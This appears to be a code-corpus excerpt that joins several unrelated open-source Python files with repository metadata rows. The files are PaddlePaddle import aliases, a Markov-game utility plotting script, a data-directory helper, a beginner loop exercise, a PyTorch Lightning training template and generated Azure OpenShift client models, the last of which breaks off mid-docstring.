from .tensor.logic import greater_equal #DEFINE_ALIAS
from .tensor.logic import greater_than #DEFINE_ALIAS
from .tensor.logic import is_empty #DEFINE_ALIAS
#from .tensor.logic import isfinite #DEFINE_ALIAS
from .tensor.logic import less_equal #DEFINE_ALIAS
from .tensor.logic import less_than #DEFINE_ALIAS
from .tensor.logic import logical_and #DEFINE_ALIAS
from .tensor.logic import logical_not #DEFINE_ALIAS
from .tensor.logic import logical_or #DEFINE_ALIAS
from .tensor.logic import logical_xor #DEFINE_ALIAS
from .tensor.logic import not_equal #DEFINE_ALIAS
from .tensor.logic import allclose #DEFINE_ALIAS
from .tensor.logic import equal_all #DEFINE_ALIAS
# from .tensor.logic import isnan #DEFINE_ALIAS
from .tensor.logic import is_tensor #DEFINE_ALIAS
from .tensor.manipulation import cast #DEFINE_ALIAS
from .tensor.manipulation import concat #DEFINE_ALIAS
from .tensor.manipulation import expand #DEFINE_ALIAS
from .tensor.manipulation import broadcast_to #DEFINE_ALIAS
from .tensor.manipulation import expand_as #DEFINE_ALIAS
from .tensor.manipulation import tile #DEFINE_ALIAS
from .tensor.manipulation import flatten #DEFINE_ALIAS
from .tensor.manipulation import gather #DEFINE_ALIAS
from .tensor.manipulation import gather_nd #DEFINE_ALIAS
from .tensor.manipulation import reshape #DEFINE_ALIAS
from .tensor.manipulation import reshape_ #DEFINE_ALIAS
from .tensor.manipulation import flip as reverse #DEFINE_ALIAS
from .tensor.manipulation import scatter #DEFINE_ALIAS
from .tensor.manipulation import scatter_ #DEFINE_ALIAS
from .tensor.manipulation import scatter_nd_add #DEFINE_ALIAS
from .tensor.manipulation import scatter_nd #DEFINE_ALIAS
from .tensor.manipulation import shard_index #DEFINE_ALIAS
from .tensor.manipulation import slice #DEFINE_ALIAS
from .tensor.manipulation import split #DEFINE_ALIAS
from .tensor.manipulation import squeeze #DEFINE_ALIAS
from .tensor.manipulation import squeeze_ #DEFINE_ALIAS
from .tensor.manipulation import stack #DEFINE_ALIAS
from .tensor.manipulation import strided_slice #DEFINE_ALIAS
from .tensor.manipulation import transpose #DEFINE_ALIAS
from .tensor.manipulation import unique #DEFINE_ALIAS
from .tensor.manipulation import unsqueeze #DEFINE_ALIAS
from .tensor.manipulation import unsqueeze_ #DEFINE_ALIAS
from .tensor.manipulation import unstack #DEFINE_ALIAS
from .tensor.manipulation import flip #DEFINE_ALIAS
from .tensor.manipulation import unbind #DEFINE_ALIAS
from .tensor.manipulation import roll #DEFINE_ALIAS
from .tensor.manipulation import chunk #DEFINE_ALIAS
from .tensor.math import abs #DEFINE_ALIAS
from .tensor.math import acos #DEFINE_ALIAS
from .tensor.math import asin #DEFINE_ALIAS
from .tensor.math import atan #DEFINE_ALIAS
from .tensor.math import ceil #DEFINE_ALIAS
from .tensor.math import cos #DEFINE_ALIAS
from .tensor.math import tan #DEFINE_ALIAS
from .tensor.math import cosh #DEFINE_ALIAS
from .tensor.math import cumsum #DEFINE_ALIAS
# from .tensor.math import elementwise_add #DEFINE_ALIAS
# from .tensor.math import elementwise_div #DEFINE_ALIAS
# from .tensor.math import elementwise_floordiv #DEFINE_ALIAS
# from .tensor.math import elementwise_mod #DEFINE_ALIAS
# from .tensor.math import elementwise_pow #DEFINE_ALIAS
# from .tensor.math import elementwise_sub #DEFINE_ALIAS
from .tensor.math import exp #DEFINE_ALIAS
from .tensor.math import floor #DEFINE_ALIAS
from .tensor.math import increment #DEFINE_ALIAS
from .tensor.math import log #DEFINE_ALIAS
from .tensor.math import log2 #DEFINE_ALIAS
from .tensor.math import log10 #DEFINE_ALIAS
from .tensor.math import multiplex #DEFINE_ALIAS
from .tensor.math import pow #DEFINE_ALIAS
from .tensor.math import reciprocal #DEFINE_ALIAS
# from .tensor.math import reduce_max #DEFINE_ALIAS
# from .tensor.math import reduce_min #DEFINE_ALIAS
# from .tensor.math import reduce_prod #DEFINE_ALIAS
# from .tensor.math import reduce_sum #DEFINE_ALIAS
from .tensor.math import all #DEFINE_ALIAS
from .tensor.math import any #DEFINE_ALIAS
from .tensor.math import round #DEFINE_ALIAS
from .tensor.math import rsqrt #DEFINE_ALIAS
from .tensor.math import scale #DEFINE_ALIAS
from .tensor.math import sign #DEFINE_ALIAS
from .tensor.math import sin #DEFINE_ALIAS
from .tensor.math import sinh #DEFINE_ALIAS
from .tensor.math import sqrt #DEFINE_ALIAS
from .tensor.math import square #DEFINE_ALIAS
from .tensor.math import stanh #DEFINE_ALIAS
from .tensor.math import sum #DEFINE_ALIAS
from .tensor.math import tanh #DEFINE_ALIAS
from .tensor.math import tanh_ #DEFINE_ALIAS
from .tensor.math import add_n #DEFINE_ALIAS
from .tensor.math import max #DEFINE_ALIAS
from .tensor.math import maximum #DEFINE_ALIAS
from .tensor.math import min #DEFINE_ALIAS
from .tensor.math import minimum #DEFINE_ALIAS
from .tensor.math import mm #DEFINE_ALIAS
from .tensor.math import divide #DEFINE_ALIAS
from .tensor.math import floor_divide #DEFINE_ALIAS
from .tensor.math import remainder #DEFINE_ALIAS
from .tensor.math import mod #DEFINE_ALIAS
from .tensor.math import floor_mod #DEFINE_ALIAS
from .tensor.math import multiply #DEFINE_ALIAS
from .tensor.math import add #DEFINE_ALIAS
from .tensor.math import subtract #DEFINE_ALIAS
from .tensor.math import atan #DEFINE_ALIAS
from .tensor.math import logsumexp #DEFINE_ALIAS
from .tensor.math import inverse #DEFINE_ALIAS
from .tensor.math import log1p #DEFINE_ALIAS
from .tensor.math import erf #DEFINE_ALIAS
from .tensor.math import addmm #DEFINE_ALIAS
from .tensor.math import clip #DEFINE_ALIAS
from .tensor.math import trace #DEFINE_ALIAS
from .tensor.math import kron #DEFINE_ALIAS
from .tensor.math import isfinite #DEFINE_ALIAS
from .tensor.math import isinf #DEFINE_ALIAS
from .tensor.math import isnan #DEFINE_ALIAS
from .tensor.math import prod #DEFINE_ALIAS
from .tensor.math import broadcast_shape #DEFINE_ALIAS
from .tensor.math import conj #DEFINE_ALIAS
from .tensor.random import multinomial #DEFINE_ALIAS
from .tensor.random import standard_normal
from .tensor.random import normal
from .tensor.random import uniform #DEFINE_ALIAS
from .tensor.random import randn #DEFINE_ALIAS
from .tensor.random import rand #DEFINE_ALIAS
from .tensor.random import randint #DEFINE_ALIAS
from .tensor.random import randperm #DEFINE_ALIAS
from .tensor.search import argmax #DEFINE_ALIAS
from .tensor.search import argmin #DEFINE_ALIAS
from .tensor.search import argsort #DEFINE_ALIAS
# from .tensor.search import has_inf #DEFINE_ALIAS
# from .tensor.search import has_nan #DEFINE_ALIAS
from .tensor.search import masked_select #DEFINE_ALIAS
from .tensor.search import topk #DEFINE_ALIAS
from .tensor.search import where #DEFINE_ALIAS
from .tensor.search import index_select #DEFINE_ALIAS
from .tensor.search import nonzero #DEFINE_ALIAS
from .tensor.search import sort #DEFINE_ALIAS
from .tensor.to_string import set_printoptions #DEFINE_ALIAS
from .framework.random import seed #DEFINE_ALIAS
from .framework.random import get_cuda_rng_state #DEFINE_ALIAS
from .framework.random import set_cuda_rng_state #DEFINE_ALIAS
from .framework import ParamAttr #DEFINE_ALIAS
# from .framework import create_global_var #DEFINE_ALIAS
from .framework import create_parameter #DEFINE_ALIAS
from .framework import CPUPlace #DEFINE_ALIAS
from .framework import CUDAPlace #DEFINE_ALIAS
from .framework import CUDAPinnedPlace #DEFINE_ALIAS
from .framework import grad #DEFINE_ALIAS
from .framework import no_grad #DEFINE_ALIAS
from .framework import save #DEFINE_ALIAS
from .framework import load #DEFINE_ALIAS
from .framework import DataParallel #DEFINE_ALIAS
from .framework import set_default_dtype #DEFINE_ALIAS
from .framework import get_default_dtype #DEFINE_ALIAS
from .tensor.search import index_sample #DEFINE_ALIAS
from .tensor.stat import mean #DEFINE_ALIAS
# from .tensor.stat import reduce_mean #DEFINE_ALIAS
from .tensor.stat import std #DEFINE_ALIAS
from .tensor.stat import var #DEFINE_ALIAS
# from .fluid.data import data
from .tensor.stat import numel #DEFINE_ALIAS
from .tensor.stat import median #DEFINE_ALIAS
from .device import get_cudnn_version
from .device import set_device
from .device import get_device
from .device import is_compiled_with_cuda #DEFINE_ALIAS
from .device import is_compiled_with_xpu
from .device import XPUPlace
# from .tensor.tensor import Tensor #DEFINE_ALIAS
# from .tensor.tensor import LoDTensor #DEFINE_ALIAS
# from .tensor.tensor import LoDTensorArray #DEFINE_ALIAS
from .fluid.dygraph.base import enable_dygraph as disable_static #DEFINE_ALIAS
from .fluid.dygraph.base import disable_dygraph as enable_static #DEFINE_ALIAS
from .fluid.framework import in_dygraph_mode as in_dynamic_mode #DEFINE_ALIAS
from .fluid.layers import crop_tensor as crop #DEFINE_ALIAS
from . import jit
from . import static
from . import amp
from . import onnx
# high-level api
from .hapi import Model
from .hapi import callbacks
from .hapi import summary
from .hapi import flops
import paddle.text
import paddle.vision
disable_static()
| 44.079585 | 90 | 0.81278 |
7cdbe5c5563fc4649f21b2c662a3f27ea1cdec9c | 12,317 | py | Python | src/zero_sum/plots.py | sbhambr1/MarkovGameSolvers | cd5366faf2082e467dc0ef04c52c5b5b000e9176 | [
"MIT"
] | null | null | null | src/zero_sum/plots.py | sbhambr1/MarkovGameSolvers | cd5366faf2082e467dc0ef04c52c5b5b000e9176 | [
"MIT"
] | null | null | null | src/zero_sum/plots.py | sbhambr1/MarkovGameSolvers | cd5366faf2082e467dc0ef04c52c5b5b000e9176 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
import numpy as np
strategies = np.array([
[
#gamma = 0.5
[-9.563336572173805, -8.193748914742143, -10.270220524396596, -3.0000000000000004, -7.553846153846153, -7.904142011834319, -3.0, -3.0, -3.0, -3.0],
[-7.378487640724603, -3.3197512739857147, -7.496142688168831, -3.0000000000000004, -3.0, -3.0, -3.0, -3.0, -3.0, -3.0],
[-9.314285714285715, -6.0, -11.8, -6.0, -6.0, -6.0, -6.0, -6.0, -6.0, -6.0]
],
[
#gamma = 0.55
[-10.524329851693846, -9.121195380360348, -11.382794510864285, -3.333333333333334, -8.308123249299719, -8.767977779347031, -3.333333333333334, -3.333333333333334, -3.333333333333334, -3.333333333333334],
[-7.853847828218031, -3.71793284163171, -7.966237505840968, -3.333333333333334, -3.333333333333333, -3.333333333333333, -3.333333333333334, -3.333333333333334, -3.333333333333334, -3.333333333333334],
[-10.028985507246377, -6.666666666666666, -13.11111111111111, -6.666666666666666, -6.666666666666666, -6.666666666666666, -6.666666666666666, -6.666666666666666, -6.666666666666666, -6.666666666666666]
],
[
#gamma = 0.6
[-11.719684181565645, -10.273338406900049, -12.76628614916286, -3.75, -9.231481481481477, -9.840534979423865, -3.75, -3.75, -3.75, -3.75],
[-8.42965572232598, -4.21204039850597, -8.528273788767603, -3.7499999999999982, -3.7499999999999982, -3.7499999999999982, -3.7499999999999982, -3.7499999999999982, -3.7499999999999982, -3.7499999999999982],
[-10.911764705882351, -7.499999999999999, -14.441176470588236, -7.499999999999999, -7.499999999999999, -7.499999999999999, -7.499999999999999, -7.499999999999999, -7.499999999999999, -7.499999999999999]
],
[
#gamma = 0.65
[-13.246274902675406, -11.742746583844642, -14.533245644719841, -4.285714285714285, -10.388807069219439, -11.206747339173734, -4.285714285714285, -4.285714285714285, -4.285714285714285, -4.285714285714285],
[-9.145905020699661, -4.841618667247477, -9.218958552423087, -4.285714285714285, -4.285714285714285, -4.285714285714285, -4.285714285714283, -4.285714285714283, -4.285714285714283, -4.285714285714283],
[-12.03411513859275, -8.57142857142857, -15.616204690831555, -8.57142857142857, -8.57142857142857, -8.57142857142857, -8.57142857142857, -8.57142857142857, -8.57142857142857, -8.57142857142857]
],
[
#gamma = 0.7
[-15.26280962470669, -13.681019910677742, -16.868493443177165, -4.999999999999998, -11.883720930232553, -13.004326663061104, -4.999999999999998, -4.999999999999998, -4.999999999999998, -4.999999999999998],
[-10.068193838520614, -5.671752735193775, -10.099054988853647, -4.999999999999998, -4.999999999999998, -4.999999999999998, -4.999999999999998, -4.999999999999998, -4.999999999999998, -4.999999999999998],
[-13.515151515151512, -9.999999999999996, -17.15151515151515, -9.999999999999996, -9.999999999999996, -9.999999999999996, -9.999999999999996, -9.999999999999996, -9.999999999999996, -9.999999999999996]
],
[
#gamma = 0.75
[-18.048619027086353, -16.354914089347076, -20.098144329896904, -5.999999999999999, -13.893333333333327, -15.47199999999999, -5.999999999999998, -5.999999999999998, -5.999999999999998, -5.999999999999998],
[-11.364085664816024, -6.829408299891047, -11.362958194659226, -5.999999999999998, -5.999999999999998, -5.999999999999998, -5.999999999999998, -5.999999999999998, -5.999999999999998, -5.999999999999998],
[-15.569230769230767, -11.999999999999996, -19.261538461538457, -11.999999999999996, -11.999999999999996, -11.999999999999996, -11.999999999999996, -11.999999999999996, -11.999999999999996, -11.999999999999996]
],
[
#gamma = 0.8
[-22.14552188552189, -20.28181818181818, -24.856363636363632, -7.500000000000002, -16.749999999999993, -19.062499999999993, -7.5, -7.500000000000002, -7.500000000000002, -7.500000000000002],
[-13.227691215343736, -8.540503875101978, -13.175865235686418, -7.5, -7.500000000000001, -7.5, -7.499999999999998, -7.5, -7.5, -7.5],
[-18.625, -15.0, -22.375, -15.0, -15.0, -15.0, -15.0, -15.0, -15.0, -15.0]
],
[
#gamma = 0.85
[-28.76278844268961, -26.61680527433105, -32.56131830251732, -9.999999999999993, -21.169811320754697, -24.752580989676016, -9.999999999999993, -9.999999999999993, -9.999999999999993, -9.999999999999993],
[-16.183356468130675, -11.33189687650437, -16.033301790463963, -9.999999999999993, -9.999999999999991, -9.999999999999993, -9.999999999999993, -9.999999999999993, -9.999999999999993, -9.999999999999993],
[-23.68253968253967, -19.999999999999986, -27.49206349206348, -19.999999999999986, -19.999999999999986, -19.999999999999986, -19.999999999999986, -19.999999999999986, -19.999999999999986, -19.999999999999986]
],
[
#gamma = 0.9
[-41.27742867847752, -38.58932362753994, -47.172156505914224, -14.999999999999755, -29.095238095237843, -35.13605442176845, -14.999999999999753, -14.999999999999753, -14.999999999999753, -14.999999999999753],
[-21.789898957859354, -16.75709624029196, -21.448166972857727, -14.99999999999974, -14.99999999999974, -14.999999999999744, -14.999999999999735, -14.999999999999744, -14.999999999999744, -14.999999999999744],
[-33.74193548387047, -29.999999999999503, -37.61290322580595, -29.999999999999503, -29.999999999999503, -29.999999999999503, -29.999999999999503, -29.999999999999503, -29.999999999999503, -29.999999999999503]
],
[
#gamma = 0.95
[-74.330382553884, -70.25959327963282, -85.68377649107512, -29.99999408538547, -49.09676827893381, -60.80124278465696, -29.999994085385474, -29.99999408538546, -29.999994085385453, -29.999994085385445],
[-37.67557701062915, -32.430971145564975, -36.94165998316571, -29.999994085385467, -29.999994085385474, -29.99999408538546, -29.999994085385474, -29.99999408538546, -29.999994085385453, -29.999994085385445],
[-63.80326685929545, -59.99998817077086, -67.73769308880364, -59.99998817077086, -59.99998817077086, -59.99998817077086, -59.99998817077086, -59.99998817077086, -59.99998817077086, -59.99998817077086]
]
])
gamma = np.array([0.5,0.55,0.6,0.65,0.7,0.75,0.8,0.85,0.9,0.95])
#Plot 1
V0_URS = []
V0_OPT = []
V0_MMP = []
for i in range(len(strategies)):
V0_URS.append(strategies[i][0][0])
V0_OPT.append(strategies[i][1][0])
V0_MMP.append(strategies[i][2][0])
plt.plot(gamma, np.asarray(V0_URS), marker='o')
plt.plot(gamma, np.asarray(V0_OPT), marker='x')
plt.plot(gamma, np.asarray(V0_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S0.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show()
#Plot 2
V1_URS = []
V1_OPT = []
V1_MMP = []
for i in range(len(strategies)):
V1_URS.append(strategies[i][0][1])
V1_OPT.append(strategies[i][1][1])
V1_MMP.append(strategies[i][2][1])
plt.plot(gamma, np.asarray(V1_URS), marker='o')
plt.plot(gamma, np.asarray(V1_OPT), marker='x')
plt.plot(gamma, np.asarray(V1_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S1.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show()
#Plot 3
V2_URS = []
V2_OPT = []
V2_MMP = []
for i in range(len(strategies)):
V2_URS.append(strategies[i][0][2])
V2_OPT.append(strategies[i][1][2])
V2_MMP.append(strategies[i][2][2])
plt.plot(gamma, np.asarray(V2_URS), marker='o')
plt.plot(gamma, np.asarray(V2_OPT), marker='x')
plt.plot(gamma, np.asarray(V2_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S2.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show()
#Plot 4
V3_URS = []
V3_OPT = []
V3_MMP = []
for i in range(len(strategies)):
V3_URS.append(strategies[i][0][3])
V3_OPT.append(strategies[i][1][3])
V3_MMP.append(strategies[i][2][3])
plt.plot(gamma, np.asarray(V3_URS), marker='o')
plt.plot(gamma, np.asarray(V3_OPT), marker='x')
plt.plot(gamma, np.asarray(V3_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S3.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show()
#Plot 5
V4_URS = []
V4_OPT = []
V4_MMP = []
for i in range(len(strategies)):
V4_URS.append(strategies[i][0][4])
V4_OPT.append(strategies[i][1][4])
V4_MMP.append(strategies[i][2][4])
plt.plot(gamma, np.asarray(V4_URS), marker='o')
plt.plot(gamma, np.asarray(V4_OPT), marker='x')
plt.plot(gamma, np.asarray(V4_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S4.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show()
#Plot 6
V5_URS = []
V5_OPT = []
V5_MMP = []
for i in range(len(strategies)):
V5_URS.append(strategies[i][0][5])
V5_OPT.append(strategies[i][1][5])
V5_MMP.append(strategies[i][2][5])
plt.plot(gamma, np.asarray(V5_URS), marker='o')
plt.plot(gamma, np.asarray(V5_OPT), marker='x')
plt.plot(gamma, np.asarray(V5_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S5.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show()
#Plot 7
V6_URS = []
V6_OPT = []
V6_MMP = []
for i in range(len(strategies)):
V6_URS.append(strategies[i][0][6])
V6_OPT.append(strategies[i][1][6])
V6_MMP.append(strategies[i][2][6])
plt.plot(gamma, np.asarray(V6_URS), marker='o')
plt.plot(gamma, np.asarray(V6_OPT), marker='x')
plt.plot(gamma, np.asarray(V6_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S6.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show()
#Plot 8
V7_URS = []
V7_OPT = []
V7_MMP = []
for i in range(len(strategies)):
V7_URS.append(strategies[i][0][7])
V7_OPT.append(strategies[i][1][7])
V7_MMP.append(strategies[i][2][7])
plt.plot(gamma, np.asarray(V7_URS), marker='o')
plt.plot(gamma, np.asarray(V7_OPT), marker='x')
plt.plot(gamma, np.asarray(V7_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S7.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show()
#Plot 9
V8_URS = []
V8_OPT = []
V8_MMP = []
for i in range(len(strategies)):
V8_URS.append(strategies[i][0][8])
V8_OPT.append(strategies[i][1][8])
V8_MMP.append(strategies[i][2][8])
plt.plot(gamma, np.asarray(V8_URS), marker='o')
plt.plot(gamma, np.asarray(V8_OPT), marker='x')
plt.plot(gamma, np.asarray(V8_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S8.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show()
#Plot 10
V9_URS = []
V9_OPT = []
V9_MMP = []
for i in range(len(strategies)):
V9_URS.append(strategies[i][0][9])
V9_OPT.append(strategies[i][1][9])
V9_MMP.append(strategies[i][2][9])
plt.plot(gamma, np.asarray(V9_URS), marker='o')
plt.plot(gamma, np.asarray(V9_OPT), marker='x')
plt.plot(gamma, np.asarray(V9_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S9.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show() | 41.47138 | 218 | 0.697735 |
0b1ccb2de9b985f25357a45fe5fd16e2eab72b61 | 400 | py | Python | webviz_config/_user_data_dir.py | ivarbje/webviz-config | d1096789e1b0354dbef44555ab79c8a88dbc837c | [
"MIT"
] | null | null | null | webviz_config/_user_data_dir.py | ivarbje/webviz-config | d1096789e1b0354dbef44555ab79c8a88dbc837c | [
"MIT"
] | null | null | null | webviz_config/_user_data_dir.py | ivarbje/webviz-config | d1096789e1b0354dbef44555ab79c8a88dbc837c | [
"MIT"
] | null | null | null | import sys
from pathlib import Path
def user_data_dir() -> Path:
"""Returns platform specific path to store user application data
"""
if sys.platform == "win32":
return Path.home() / "Application Data" / "webviz"
if sys.platform == "darwin":
return Path.home() / "Library" / "Application Support" / "webviz"
return Path.home() / ".local" / "share" / "webviz"
| 25 | 73 | 0.625 |
6185316b5d2f45e7cbe31bea0d25e1e49b81ab73 | 1,000 | py | Python | ch01-05/04_01-magicians.py | remotephone/pythoncrashcourse | 837d05c5ef4976621bd2206328254749a71d60ff | [
"Apache-2.0"
] | null | null | null | ch01-05/04_01-magicians.py | remotephone/pythoncrashcourse | 837d05c5ef4976621bd2206328254749a71d60ff | [
"Apache-2.0"
] | null | null | null | ch01-05/04_01-magicians.py | remotephone/pythoncrashcourse | 837d05c5ef4976621bd2206328254749a71d60ff | [
"Apache-2.0"
] | null | null | null | magicians = ['alice', 'david', 'carolina']
for magician in magicians:
print(magician)
print("\n====================")
magicians = ['alice', 'david', 'carolina']
for magician in magicians:
print(magician.title() + ", that was a great trick!")
print("I can't wait to see your next trick, " + magician.title() + ".\n")
print("Thank you everyone, that was a great show!")
print("\n====================\n")
print ("""This is improperly formatted code:\n
magicians = ['alice', 'david', 'carolina']
for magician in magicians:
print(magician)\n
It should look like this:\n
magicians = ['alice', 'david', 'carolina']
for magician in magicians:
print(magician)\n
""")
print("Now for pizza stuff")
pizza = ['pepperoni', 'cheese', 'olive']
for za in pizza:
print("I like " + za + " pizza.")
print("I really like pizza!\n")
print("Now for animals")
animals = ['dog', 'cat', 'snek']
for animal in animals:
print("I would like to boop a " + animal + ".")
print("That would be nice") | 26.315789 | 77 | 0.624 |
c4def8a81d6b41d37f98fbb832fa1925efbaee35 | 1,108 | py | Python | base_scripts/base_train.py | tugot17/Pytorch-Lightning-Templates- | 36ec7ac8f1699e4e266f0d4f08df67a2873ba0f8 | [
"MIT"
] | 2 | 2020-11-04T19:14:51.000Z | 2021-03-04T13:14:17.000Z | base_scripts/base_train.py | tugot17/Pytorch-Lightning-Templates- | 36ec7ac8f1699e4e266f0d4f08df67a2873ba0f8 | [
"MIT"
] | null | null | null | base_scripts/base_train.py | tugot17/Pytorch-Lightning-Templates- | 36ec7ac8f1699e4e266f0d4f08df67a2873ba0f8 | [
"MIT"
] | null | null | null | import os
import pytorch_lightning as pl
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
from pytorch_lightning.loggers import WandbLogger
if __name__ == "__main__":
dm = ...
model = ...
# Fast run first
trainer = Trainer(
gpus=1, fast_dev_run=True, checkpoint_callback=False, logger=False
)
checkpoint_callback = ModelCheckpoint(
filepath=os.getcwd(),
save_top_k=2,
verbose=True,
monitor="val/loss",
mode="min",
)
experiment_name = ...
PROJECT_NAME = ...
logger = WandbLogger(name=experiment_name, project=PROJECT_NAME)
# And then actual training
pl.seed_everything(42)
trainer = Trainer(
max_epochs=40,
logger=logger,
gpus=1,
# precision=16,
deterministic=True,
accumulate_grad_batches=2,
callbacks=[EarlyStopping(monitor="val/loss")],
# resume_from_checkpoint = 'my_checkpoint.ckpt'
)
trainer.fit(model, dm)
| 23.574468 | 74 | 0.665162 |
2b203a81f5958cf91c95e1e090a7eda9bbff514f | 29,527 | py | Python | python/client/azure/mgmt/redhatopenshift/v2021_01_31_preview/models/_models_py3.py | Thanonchai/ARO-RP | 823d357376c6c1ce38ce026acadca6103a0fe2c9 | [
"Apache-2.0"
] | null | null | null | python/client/azure/mgmt/redhatopenshift/v2021_01_31_preview/models/_models_py3.py | Thanonchai/ARO-RP | 823d357376c6c1ce38ce026acadca6103a0fe2c9 | [
"Apache-2.0"
] | 1 | 2021-01-22T16:19:04.000Z | 2021-01-22T16:19:04.000Z | python/client/azure/mgmt/redhatopenshift/v2021_01_31_preview/models/_models_py3.py | troy0820/ARO-RP | 32dff228210270a02dcd2a66d8c642da53c4e120 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft and contributors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
from msrest.exceptions import HttpOperationError
class APIServerProfile(Model):
"""APIServerProfile represents an API server profile.
:param visibility: API server visibility. Possible values include:
'Private', 'Public'
:type visibility: str or
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.enum
:param url: The URL to access the cluster API server.
:type url: str
:param ip: The IP of the cluster API server.
:type ip: str
"""
_attribute_map = {
'visibility': {'key': 'visibility', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'ip': {'key': 'ip', 'type': 'str'},
}
def __init__(self, *, visibility=None, url: str=None, ip: str=None, **kwargs) -> None:
super(APIServerProfile, self).__init__(**kwargs)
self.visibility = visibility
self.url = url
self.ip = ip
class Resource(Model):
"""Common fields that are returned in the response for all Azure Resource
Manager resources.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
:vartype id: str
:ivar name: The name of the resource
:vartype name: str
:ivar type: The type of the resource. E.g.
"Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
:vartype type: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, **kwargs) -> None:
super(Resource, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
class AzureEntityResource(Resource):
"""The resource model definition for an Azure Resource Manager resource with
an etag.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
:vartype id: str
:ivar name: The name of the resource
:vartype name: str
:ivar type: The type of the resource. E.g.
"Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
:vartype type: str
:ivar etag: Resource Etag.
:vartype etag: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'etag': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, **kwargs) -> None:
super(AzureEntityResource, self).__init__(**kwargs)
self.etag = None
class CloudError(Model):
"""CloudError represents a cloud error.
:param error: An error response from the service.
:type error:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.CloudErrorBody
"""
_attribute_map = {
'error': {'key': 'error', 'type': 'CloudErrorBody'},
}
def __init__(self, *, error=None, **kwargs) -> None:
super(CloudError, self).__init__(**kwargs)
self.error = error
class CloudErrorException(HttpOperationError):
"""Server responsed with exception of type: 'CloudError'.
:param deserialize: A deserializer
:param response: Server response to be deserialized.
"""
def __init__(self, deserialize, response, *args):
super(CloudErrorException, self).__init__(deserialize, response, 'CloudError', *args)
class CloudErrorBody(Model):
"""CloudErrorBody represents the body of a cloud error.
:param code: An identifier for the error. Codes are invariant and are
intended to be consumed programmatically.
:type code: str
:param message: A message describing the error, intended to be suitable
for display in a user interface.
